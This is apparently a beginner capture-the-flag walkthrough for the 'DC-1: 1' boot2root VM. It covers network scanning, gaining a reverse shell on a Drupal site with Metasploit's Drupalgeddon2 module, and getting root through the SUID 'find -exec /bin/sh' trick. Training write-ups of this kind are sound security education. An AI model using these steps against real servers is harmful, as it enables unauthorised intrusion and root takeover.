Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

• IP Discovery using netdiscover
• Network scanning (Nmap)
• Surfing HTTPS service port (80)
• Finding Drupal CMS
• Exploiting Drupalgeddon2 to get a reverse shell
• Finding files with SUID bit set
• Finding the “find” command with SUID bit set
• Getting root shell with “find” command
• Getting final flag

Walkthrough

Let’s start off with scanning the network to find our target.

1	netdiscover

We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

1	nmap -sV 192.168.1.104

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)

We find that port 80 is running http, so we open the IP in our browser.

When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and successfully able to get a reverse shell.

123	msf5 > use exploit/unix/webapp/drupal_drupalgeddon2msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.

12	python -c ‘import pty; pty.spawn(“/bin/bash”)’find / -perm -u=s -type f 2>/dev/null

As “find” command has SUID bit set, we can execute the command as “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.  

After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell as root user. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.

123	touch rajfind raj -exec “whoami” \;find raj -exec “/bin/sh” \;

Author: Sayantan Bera